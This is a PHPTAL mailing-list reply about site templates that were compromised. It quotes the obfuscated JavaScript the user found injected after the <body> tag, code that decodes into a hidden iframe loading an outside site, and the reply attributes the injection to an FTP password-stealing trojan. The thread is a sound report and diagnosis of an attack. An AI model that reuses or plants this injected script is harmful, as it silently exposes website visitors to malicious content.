Szymek Przybył <apocalyp...@...> writes:

> 
> I done a few sites in PHPTAL. When I today visit one of them - I saw an 
> error:
> 
> exception 'PHPTAL_Exception' with message 'Invalid element name 
> 'ohhe.length;qhxk+=3){ifdm+=rkfg(ohhe.substr'' in 
> /inc/PHPTAL-1.1.14/PHPTAL/Dom/Node.php:107 Stack trace: # etc...
> 
> When I check code, I find in main template (main.html) some addon, after 
> <body>:
> 
> <!-- ad --><script language="JavaScript">function rkfg(jflq){return 
> String.fromCharCode(jflq);}var
> 
> 
ohhe="06010510211409710910103211511409906103910411611611205804704711511711210111
41051111140971001220461051101021110471111121051150470631160610490510390321191051
00116104061039048039032104101105103104116061039048039032115116121108101061039118
10511510509810510810511612105803210410510010010111005903906206004710510211409710
9101062";var 
> ifdm="";for(qhxk=0;qhxk<ohhe.length;qhxk+=3){ifdm+=rkfg(ohhe.substr 
> (qhxk, 3));}window.status='Done';document.write(ifdm);</script>
> <!-- /ad -->
> 
> I found it also in files called home.html (home page template) and 
> index.html. Sometimes this code appear in the end of file. This isn't a 
> server fault - I checked page, which I wrote in PHPTAL too, which is on 
> the other server - and there was the same addon-code ;|
> 
> Have anybody knew, why this code may appeared? Maybe someone found some 
> security bug in phptal?
> 
> This code appear also in index.html file, which I don't used in PHPTAL.
> 
> cheers!
> szymek
> 


Read this forum http://www.webhostingtalk.com/showthread.php?t=757762
This sounds like a ftp trojan that acquired your passwords, thus the posting 
on both of your sites.






_______________________________________________
PHPTAL mailing list
PHPTAL@lists.motion-twin.com
http://lists.motion-twin.com/mailman/listinfo/phptal

Reply via email to